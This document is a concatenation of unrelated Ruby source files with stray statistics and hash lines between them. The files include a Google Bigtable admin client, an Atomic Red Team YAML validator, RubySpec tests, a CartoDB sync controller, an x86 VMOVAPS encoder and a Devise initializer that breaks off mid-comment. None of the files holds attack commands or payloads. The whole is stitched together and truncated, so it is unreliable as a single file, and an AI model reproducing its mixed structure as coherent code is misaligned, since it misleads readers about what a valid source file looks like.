# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require "google/gax" require "pathname" module Google module Cloud module Bigtable # rubocop:disable LineLength ## # # Ruby Client for Cloud Bigtable Admin API # # [Cloud Bigtable Admin API][Product Documentation]: # Administer your Cloud Bigtable tables and instances. # - [Product Documentation][] # # ## Quick Start # In order to use this library, you first need to go through the following # steps: # # 1. [Select or create a Cloud Platform project.](https://console.cloud.google.com/project) # 2. [Enable billing for your project.](https://cloud.google.com/billing/docs/how-to/modify-project#enable_billing_for_a_project) # 3. [Enable the Cloud Bigtable Admin API.](https://console.cloud.google.com/apis/library/bigtableadmin.googleapis.com) # 4. [Setup Authentication.](https://googleapis.dev/ruby/google-cloud-bigtable/latest/file.AUTHENTICATION.html) # # ### Installation # ``` # $ gem install google-cloud-bigtable # ``` # # ### Next Steps # - Read the [Cloud Bigtable Admin API Product documentation][Product Documentation] # to learn more about the product and see How-to Guides. # - View this [repository's main README](https://github.com/googleapis/google-cloud-ruby/blob/master/README.md) # to see the full list of Cloud APIs that we cover. # # [Product Documentation]: https://cloud.google.com/bigtable/docs/reference/admin/rpc # # ## Enabling Logging # # To enable logging for this library, set the logger for the underlying [gRPC](https://github.com/grpc/grpc/tree/master/src/ruby) library. # The logger that you set may be a Ruby stdlib [`Logger`](https://ruby-doc.org/stdlib-2.5.0/libdoc/logger/rdoc/Logger.html) as shown below, # or a [`Google::Cloud::Logging::Logger`](https://googleapis.dev/ruby/google-cloud-logging/latest) # that will write logs to [Stackdriver Logging](https://cloud.google.com/logging/). See [grpc/logconfig.rb](https://github.com/grpc/grpc/blob/master/src/ruby/lib/grpc/logconfig.rb) # and the gRPC [spec_helper.rb](https://github.com/grpc/grpc/blob/master/src/ruby/spec/spec_helper.rb) for additional information. # # Configuring a Ruby stdlib logger: # # ```ruby # require "logger" # # module MyLogger # LOGGER = Logger.new $stderr, level: Logger::WARN # def logger # LOGGER # end # end # # # Define a gRPC module-level logger method before grpc/logconfig.rb loads. # module GRPC # extend MyLogger # end # ``` # module Admin # rubocop:enable LineLength FILE_DIR = File.realdirpath(Pathname.new(__FILE__).join("..").join("admin")) AVAILABLE_VERSIONS = Dir["#{FILE_DIR}/*"] .select { |file| File.directory?(file) } .select { |dir| Google::Gax::VERSION_MATCHER.match(File.basename(dir)) } .select { |dir| File.exist?(dir + ".rb") } .map { |dir| File.basename(dir) } module BigtableInstanceAdmin ## # Service for creating, configuring, and deleting Cloud Bigtable Instances and # Clusters. Provides access to the Instance and Cluster schemas only, not the # tables' metadata or data stored in those tables. # # @param version [Symbol, String] # The major version of the service to be used. By default :v2 # is used. # @overload new(version:, credentials:, scopes:, client_config:, timeout:) # @param credentials [Google::Auth::Credentials, String, Hash, GRPC::Core::Channel, GRPC::Core::ChannelCredentials, Proc] # Provides the means for authenticating requests made by the client. This parameter can # be many types. # A `Google::Auth::Credentials` uses a the properties of its represented keyfile for # authenticating requests made by this client. # A `String` will be treated as the path to the keyfile to be used for the construction of # credentials for this client. # A `Hash` will be treated as the contents of a keyfile to be used for the construction of # credentials for this client. # A `GRPC::Core::Channel` will be used to make calls through. # A `GRPC::Core::ChannelCredentials` for the setting up the RPC client. The channel credentials # should already be composed with a `GRPC::Core::CallCredentials` object. # A `Proc` will be used as an updater_proc for the Grpc channel. The proc transforms the # metadata for requests, generally, to give OAuth credentials. # @param scopes [Array<String>] # The OAuth scopes for this service. This parameter is ignored if # an updater_proc is supplied. # @param client_config [Hash] # A Hash for call options for each method. See # Google::Gax#construct_settings for the structure of # this data. Falls back to the default config if not specified # or the specified config is missing data points. # @param timeout [Numeric] # The default timeout, in seconds, for calls made through this client. # @param metadata [Hash] # Default metadata to be sent with each request. This can be overridden on a per call basis. # @param exception_transformer [Proc] # An optional proc that intercepts any exceptions raised during an API call to inject # custom error handling. def self.new(*args, version: :v2, **kwargs) unless AVAILABLE_VERSIONS.include?(version.to_s.downcase) raise "The version: #{version} is not available. The available versions " \ "are: [#{AVAILABLE_VERSIONS.join(", ")}]" end require "#{FILE_DIR}/#{version.to_s.downcase}" version_module = Google::Cloud::Bigtable::Admin .constants .select {|sym| sym.to_s.downcase == version.to_s.downcase} .first Google::Cloud::Bigtable::Admin.const_get(version_module)::BigtableInstanceAdmin.new(*args, **kwargs) end end module BigtableTableAdmin ## # Service for creating, configuring, and deleting Cloud Bigtable tables. # # # Provides access to the table schemas only, not the data stored within # the tables. # # @param version [Symbol, String] # The major version of the service to be used. By default :v2 # is used. # @overload new(version:, credentials:, scopes:, client_config:, timeout:) # @param credentials [Google::Auth::Credentials, String, Hash, GRPC::Core::Channel, GRPC::Core::ChannelCredentials, Proc] # Provides the means for authenticating requests made by the client. This parameter can # be many types. # A `Google::Auth::Credentials` uses a the properties of its represented keyfile for # authenticating requests made by this client. # A `String` will be treated as the path to the keyfile to be used for the construction of # credentials for this client. # A `Hash` will be treated as the contents of a keyfile to be used for the construction of # credentials for this client. # A `GRPC::Core::Channel` will be used to make calls through. # A `GRPC::Core::ChannelCredentials` for the setting up the RPC client. The channel credentials # should already be composed with a `GRPC::Core::CallCredentials` object. # A `Proc` will be used as an updater_proc for the Grpc channel. The proc transforms the # metadata for requests, generally, to give OAuth credentials. # @param scopes [Array<String>] # The OAuth scopes for this service. This parameter is ignored if # an updater_proc is supplied. # @param client_config [Hash] # A Hash for call options for each method. See # Google::Gax#construct_settings for the structure of # this data. Falls back to the default config if not specified # or the specified config is missing data points. # @param timeout [Numeric] # The default timeout, in seconds, for calls made through this client. # @param metadata [Hash] # Default metadata to be sent with each request. This can be overridden on a per call basis. # @param exception_transformer [Proc] # An optional proc that intercepts any exceptions raised during an API call to inject # custom error handling. def self.new(*args, version: :v2, **kwargs) unless AVAILABLE_VERSIONS.include?(version.to_s.downcase) raise "The version: #{version} is not available. The available versions " \ "are: [#{AVAILABLE_VERSIONS.join(", ")}]" end require "#{FILE_DIR}/#{version.to_s.downcase}" version_module = Google::Cloud::Bigtable::Admin .constants .select {|sym| sym.to_s.downcase == version.to_s.downcase} .first Google::Cloud::Bigtable::Admin.const_get(version_module)::BigtableTableAdmin.new(*args, **kwargs) end end end end end end
50.931034
186
0.625206
bf104bf8a401f19b26b2d81f11e816fb3976b446
9,058
require 'yaml' require 'erb' require 'attack_api' class AtomicRedTeam ATTACK_API = Attack.new ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics" # TODO- should these all be relative URLs? ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team" # # Returns a list of paths that contain Atomic Tests # def atomic_test_paths Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort end # # Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML) # def atomic_tests @atomic_tests ||= atomic_test_paths.collect do |path| atomic_yaml = YAML.load(File.read path) atomic_yaml['atomic_yaml_path'] = path atomic_yaml end end # # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object # def atomic_tests_for_technique(technique_or_technique_identifier) technique_identifier = if technique_or_technique_identifier.is_a? Hash ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier else technique_or_technique_identifier end atomic_tests.find do |atomic_yaml| atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase end.to_h.fetch('atomic_tests', []) end # # Returns a Markdown formatted Github link to a technique. This will be to the edit page for # techniques that already have one or more Atomic Red Team tests, or the create page for # techniques that have no existing tests. # def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true) technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}" if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md" # we have a file for this technique, so link to it's Markdown file "[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)" else # we don't have a file for this technique, so link to an edit page "#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)" end end def validate_atomic_yaml!(yaml) raise("YAML file has no elements") if yaml.nil? raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique') raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String) raise('`display_name` element is required') unless yaml.has_key?('display_name') raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String) raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests') raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array) raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0 yaml['atomic_tests'].each_with_index do |atomic, i| raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name') raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String) raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description') raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String) raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms') raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array) valid_supported_platforms = ['windows', 'macos', 'linux'] atomic['supported_platforms'].each do |platform| if !valid_supported_platforms.include?(platform) raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}") end end if atomic['dependencies'] atomic['dependencies'].each do |dependency| raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description') raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command') raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command') end end (atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai| arg_name, arg = arg_kvp raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description') raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String) raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type') raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String) raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /[a-z_]+/ # TODO: determine if we think default values are required for EVERY input argument # raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default') # raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String) end raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor') executor = atomic['executor'] raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name') raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String) raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/ valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual'] case executor['name'] when 'manual' raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps') raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String) validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys, string: executor['steps'], string_description: "atomic_tests[#{i}].executor.steps" when 'command_prompt', 'sh', 'bash', 'powershell' raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command') raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String) validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys, string: executor['command'], string_description: "atomic_tests[#{i}].executor.command" else raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}") end validate_no_todos!(atomic, path: "atomic_tests[#{i}]") end end # # Validates that the arguments (specified in "#{arg}" format) in a string # match the input_arguments for a test # def validate_input_args_vs_string!(input_args:, string:, string_description:) input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten input_args_in_string_and_not_specced = input_args_in_string - input_args if input_args_in_string_and_not_specced.count > 0 raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments") end input_args_in_spec_not_string = input_args - input_args_in_string if input_args_in_string_and_not_specced.count > 0 raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command") end end # # Recursively validates that the hash (or something) doesn't contain a TODO # def validate_no_todos!(hashish, path:) if hashish.is_a? String raise "`#{path}` contains a TODO" if hashish.include? 'TODO' elsif hashish.is_a? Array hashish.each_with_index do |item, i| validate_no_todos! item, path: "#{path}[#{i}]" end elsif hashish.is_a? Hash hashish.each do |k, v| validate_no_todos! v, path: "#{path}.#{k}" end end end end
50.044199
182
0.684257
87593108ffd57935a0bd4a976dd5a53c2c0ee234
2,777
require File.expand_path('../../../spec_helper', __FILE__) require File.expand_path('../fixtures/classes', __FILE__) describe "Method#to_proc" do before :each do ScratchPad.record [] @m = MethodSpecs::Methods.new @meth = @m.method(:foo) end it "returns a Proc object corresponding to the method" do @meth.to_proc.kind_of?(Proc).should == true end it "returns a Proc which does not depends on the value of self" do 3.instance_exec(4, &5.method(:+)).should == 9 end it "returns a Proc object with the correct arity" do # This may seem redundant but this bug has cropped up in jruby, mri and yarv. # http://jira.codehaus.org/browse/JRUBY-124 [ :zero, :one_req, :two_req, :zero_with_block, :one_req_with_block, :two_req_with_block, :one_opt, :one_req_one_opt, :one_req_two_opt, :two_req_one_opt, :one_opt_with_block, :one_req_one_opt_with_block, :one_req_two_opt_with_block, :two_req_one_opt_with_block, :zero_with_splat, :one_req_with_splat, :two_req_with_splat, :one_req_one_opt_with_splat, :one_req_two_opt_with_splat, :two_req_one_opt_with_splat, :zero_with_splat_and_block, :one_req_with_splat_and_block, :two_req_with_splat_and_block, :one_req_one_opt_with_splat_and_block, :one_req_two_opt_with_splat_and_block, :two_req_one_opt_with_splat_and_block ].each do |m| @m.method(m).to_proc.arity.should == @m.method(m).arity end end it "returns a proc that can be used by define_method" do x = 'test' to_s = class << x define_method :foo, method(:to_s).to_proc to_s end x.foo.should == to_s end it "returns a proc that can be yielded to" do x = Object.new def x.foo(*a); a; end def x.bar; yield; end def x.baz(*a); yield(*a); end m = x.method :foo x.bar(&m).should == [] x.baz(1,2,3,&m).should == [1,2,3] end it "returns a proc whose binding has the same receiver as the method" do @meth.receiver.should == @meth.to_proc.binding.receiver end # #5926 it "returns a proc that can receive a block" do x = Object.new def x.foo; yield 'bar'; end m = x.method :foo result = nil m.to_proc.call {|val| result = val} result.should == 'bar' end it "can be called directly and not unwrap arguments like a block" do obj = MethodSpecs::ToProcBeta.new obj.to_proc.call([1]).should == [1] end it "should correct handle arguments (unwrap)" do obj = MethodSpecs::ToProcBeta.new array = [[1]] array.each(&obj) ScratchPad.recorded.should == [[1]] end it "executes method with whole array (one argument)" do obj = MethodSpecs::ToProcBeta.new array = [[1, 2]] array.each(&obj) ScratchPad.recorded.should == [[1, 2]] end end
29.542553
121
0.676269
7a7bab3820592d20d4583b2184eacf458ec8f47f
376
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::AlertsManagement::Mgmt::V2019_05_05_preview module Models # # Defines values for State # module State New = "New" Acknowledged = "Acknowledged" Closed = "Closed" end end end
22.117647
70
0.68617
79b0a7ff432c352e9c5488e8e6ed99fabf10febd
176
class DropUnusedColumns < ActiveRecord::Migration[5.0] def change remove_column :links, :impressions_count, :integer remove_column :links, :score, :integer end end
25.142857
54
0.75
6a90e74db1ba1c031605cb40ab5363609a21a016
8,251
require 'json' require_relative '../../../models/synchronization/member' require_relative '../../../models/synchronization/collection' require_relative '../../../../services/datasources/lib/datasources' require_relative '../../../../services/platform-limits/platform_limits' require_dependency 'carto/url_validator' class Api::Json::SynchronizationsController < Api::ApplicationController include CartoDB include Carto::UrlValidator ssl_required :create, :update, :destroy, :sync, :sync_now before_filter :set_external_source, only: [ :create ] # Upon creation, no rate limit checks def create return head(401) unless current_user.sync_tables_enabled || @external_source @stats_aggregator.timing('synchronizations.create') do begin member_attributes = setup_member_attributes member = Synchronization::Member.new(member_attributes) member = @stats_aggregator.timing('member.save') do member.store end options = setup_data_import_options(member_attributes, member.id) data_import = @stats_aggregator.timing('save') do DataImport.create(options) end if @external_source @stats_aggregator.timing('external-data-import.save') do Carto::ExternalDataImport.new( data_import_id: data_import.id, external_source_id: @external_source.id, synchronization_id: member.id ).save end end ::Resque.enqueue(::Resque::ImporterJobs, job_id: data_import.id) # Need to mark the synchronization job as queued state. # If this is missed there is an error state that can be # achieved where the synchronization job can never be # manually kicked off ever again. This state will occur if the # resque job fails to mark the synchronization state to success or # failure (ie: resque never runs, or bug in ImporterJobs code) member.state = Synchronization::Member::STATE_QUEUED member.store response = { data_import: { endpoint: '/api/v1/imports', item_queue_id: data_import.id } }.merge(member.to_hash) render_jsonp(response) rescue CartoDB::InvalidMember => exception render_jsonp({ errors: member.full_errors }, 400) puts exception.to_s puts exception.backtrace rescue CartoDB::InvalidInterval => exception render_jsonp({ errors: "#{exception.detail['message']}: #{exception.detail['hint']}" }, 400) rescue InvalidUrlError => exception render_jsonp({ errors: exception.message }, 400) end end end def sync(from_sync_now=false) @stats_aggregator.timing('synchronizations.sync') do begin enqueued = false member = Synchronization::Member.new(id: params[:id]).fetch return head(401) unless member.authorize?(current_user) # @see /services/synchronizer/lib/synchronizer/collection.rb -> enqueue_rate_limited() if ( member.should_auto_sync? || (from_sync_now && member.can_manually_sync?) ) platform_limit = CartoDB::PlatformLimits::Importer::UserConcurrentSyncsAmount.new({ user: current_user, redis: { db: $users_metadata } }) if platform_limit.is_within_limit? @stats_aggregator.timing('enqueue') do member.enqueue end enqueued = true platform_limit.increment! end end render_jsonp( { enqueued: enqueued, synchronization_id: member.id}) rescue StandardError => exception CartoDB.notify_exception(exception) head(404) end end end def sync_now sync(true) end def update @stats_aggregator.timing('synchronizations.update') do begin member = Synchronization::Member.new(id: params.fetch('id')).fetch return head(401) unless member.authorize?(current_user) member.attributes = payload member = @stats_aggregator.timing('save') do member.store.fetch end render_jsonp(member) rescue KeyError head(404) rescue CartoDB::InvalidMember render_jsonp({ errors: member.full_errors }, 400) end end end def destroy @stats_aggregator.timing('synchronizations.destroy') do begin member = Synchronization::Member.new(id: params.fetch('id')).fetch return(head 401) unless member.authorize?(current_user) @stats_aggregator.timing('delete') do member.delete end return head 204 rescue KeyError head(404) end end end private def set_external_source @external_source = if params[:remote_visualization_id].present? get_external_source(params[:remote_visualization_id]) end end def setup_member_attributes member_attributes = payload.merge( name: params[:table_name], user_id: current_user.id, state: Synchronization::Member::STATE_CREATED, # Keep in sync with https://carto.com/developers/import-api/guides/sync-tables/#params-1 type_guessing: !["false", false].include?(params[:type_guessing]), quoted_fields_guessing: !["false", false].include?(params[:quoted_fields_guessing]), content_guessing: ["true", true].include?(params[:content_guessing]) ) if from_sync_file_provider? member_attributes = member_attributes.merge({ service_name: params[:service_name], service_item_id: params[:service_item_id] }) end if params[:remote_visualization_id].present? member_attributes[:interval] = Carto::ExternalSource::REFRESH_INTERVAL external_source = @external_source member_attributes[:url] = external_source.import_url.presence member_attributes[:service_item_id] = external_source.import_url.presence end if params[:connector].present? member_attributes[:service_name] = 'connector' member_attributes[:service_item_id] = params[:connector].to_json end member_attributes end def setup_data_import_options(member_attributes, member_id) if from_sync_file_provider? service_name = params[:service_name] service_item_id = params[:service_item_id] else service_name = CartoDB::Datasources::Url::PublicUrl::DATASOURCE_NAME service_item_id = params[:url].presence end options = { user_id: current_user.id, table_name: params[:table_name].presence, service_name: service_name, service_item_id: service_item_id, type_guessing: member_attributes[:type_guessing], quoted_fields_guessing: member_attributes[:quoted_fields_guessing], content_guessing: member_attributes[:content_guessing], create_visualization: ["true", true].include?(params[:create_vis]) } if params[:remote_visualization_id].present? external_source = get_external_source(params[:remote_visualization_id]) options.merge!(data_source: external_source.import_url.presence) elsif params[:connector].present? options[:service_name] = 'connector' options[:service_item_id] = params[:connector].to_json else url = params[:url] validate_url!(url) unless Rails.env.development? || Rails.env.test? || url.nil? || url.empty? options.merge!(data_source: url) end options.merge!({ synchronization_id: member_id }) options end def from_sync_file_provider? params.include?(:service_name) && params.include?(:service_item_id) end def payload request.body.rewind ::JSON.parse(request.body.read.to_s || String.new) end def get_external_source(remote_visualization_id) external_source = Carto::ExternalSource.where(visualization_id: remote_visualization_id).first unless remote_visualization_id.present? && external_source.importable_by?(current_user) raise CartoDB::Datasources::AuthError.new('Illegal external load') end external_source end end
33.404858
100
0.668767
ed0004d64f436d7d0bea5b5605d3a8d8053584ff
62
module Transbank module Sdk VERSION = "1.4.0" end end
10.333333
21
0.645161
1159dab3715a6645a99965d38877d9a3df1d91fc
9,055
# frozen_string_literal: true class Fisk module Instructions # Instruction VMOVAPS: Move Aligned Packed Single-Precision Floating-Point Values VMOVAPS = Instruction.new("VMOVAPS", [ # vmovaps: m128{k}{z}, xmm Form.new([ OPERAND_TYPES[73], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm{k}{z}, xmm Form.new([ OPERAND_TYPES[57], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m256{k}{z}, ymm Form.new([ OPERAND_TYPES[74], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm{k}{z}, ymm Form.new([ OPERAND_TYPES[59], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m512{k}{z}, zmm Form.new([ OPERAND_TYPES[75], OPERAND_TYPES[63], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: zmm{k}{z}, zmm Form.new([ OPERAND_TYPES[62], OPERAND_TYPES[63], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm{k}{z}, m128 Form.new([ OPERAND_TYPES[57], OPERAND_TYPES[25], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm{k}{z}, m256 Form.new([ OPERAND_TYPES[59], OPERAND_TYPES[66], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: zmm{k}{z}, m512 Form.new([ OPERAND_TYPES[62], OPERAND_TYPES[78], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_EVEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm, xmm Form.new([ OPERAND_TYPES[26], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: xmm, m128 Form.new([ OPERAND_TYPES[26], OPERAND_TYPES[25], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm, ymm Form.new([ OPERAND_TYPES[65], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 3, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 3, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: ymm, m256 Form.new([ OPERAND_TYPES[65], OPERAND_TYPES[66], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x28, 0) + add_modrm(buffer, 0, operands[0].op_value, operands[1].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m128, xmm Form.new([ OPERAND_TYPES[53], OPERAND_TYPES[24], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, # vmovaps: m256, ymm Form.new([ OPERAND_TYPES[95], OPERAND_TYPES[60], ].freeze, [ Class.new(Fisk::Encoding) { def encode buffer, operands add_VEX(buffer, operands) add_opcode(buffer, 0x29, 0) + add_modrm(buffer, 0, operands[1].op_value, operands[0].op_value, operands) + 0 end }.new.freeze, ].freeze).freeze, ].freeze).freeze end end
28.296875
85
0.480066
e2274a9080659491fa3fddde00f423ca391b510f
13,642
# Use this hook to configure devise mailer, warden hooks and so forth. # Many of these configuration options can be set straight in your model. Devise.setup do |config| # The secret key used by Devise. Devise uses this key to generate # random tokens. Changing this key will render invalid all existing # confirmation, reset password and unlock tokens in the database. # Devise will use the `secret_key_base` as its `secret_key` # by default. You can change it below and use your own secret key. # config.secret_key = '284f3b7d83dabe86af6e384921e98cad2b9523b0c1bcf993180539d3ed7b88c1148d880c5d9abe6ea7d9914595caa05038b5fed44e27d8f45c1164421b68cce6' # ==> Mailer Configuration # Configure the e-mail address which will be shown in Devise::Mailer, # note that it will be overwritten if you use your own mailer class # with default "from" parameter. config.mailer_sender = '[email protected]' # Configure the class responsible to send e-mails. # config.mailer = 'Devise::Mailer' # Configure the parent class responsible to send e-mails. # config.parent_mailer = 'ActionMailer::Base' # ==> ORM configuration # Load and configure the ORM. Supports :active_record (default) and # :mongoid (bson_ext recommended) by default. Other ORMs may be # available as additional gems. require 'devise/orm/active_record' # ==> Configuration for any authentication mechanism # Configure which keys are used when authenticating a user. The default is # just :email. You can configure it to use [:username, :subdomain], so for # authenticating a user, both parameters are required. Remember that those # parameters are used only when authenticating and not when retrieving from # session. If you need permissions, you should implement that in a before filter. # You can also supply a hash where the value is a boolean determining whether # or not authentication should be aborted when the value is not present. # config.authentication_keys = [:email] # Configure parameters from the request object used for authentication. Each entry # given should be a request method and it will automatically be passed to the # find_for_authentication method and considered in your model lookup. For instance, # if you set :request_keys to [:subdomain], :subdomain will be used on authentication. # The same considerations mentioned for authentication_keys also apply to request_keys. # config.request_keys = [] # Configure which authentication keys should be case-insensitive. # These keys will be downcased upon creating or modifying a user and when used # to authenticate or find a user. Default is :email. config.case_insensitive_keys = [:email] # Configure which authentication keys should have whitespace stripped. # These keys will have whitespace before and after removed upon creating or # modifying a user and when used to authenticate or find a user. Default is :email. config.strip_whitespace_keys = [:email] # Tell if authentication through request.params is enabled. True by default. # It can be set to an array that will enable params authentication only for the # given strategies, for example, `config.params_authenticatable = [:database]` will # enable it only for database (email + password) authentication. # config.params_authenticatable = true # Tell if authentication through HTTP Auth is enabled. False by default. # It can be set to an array that will enable http 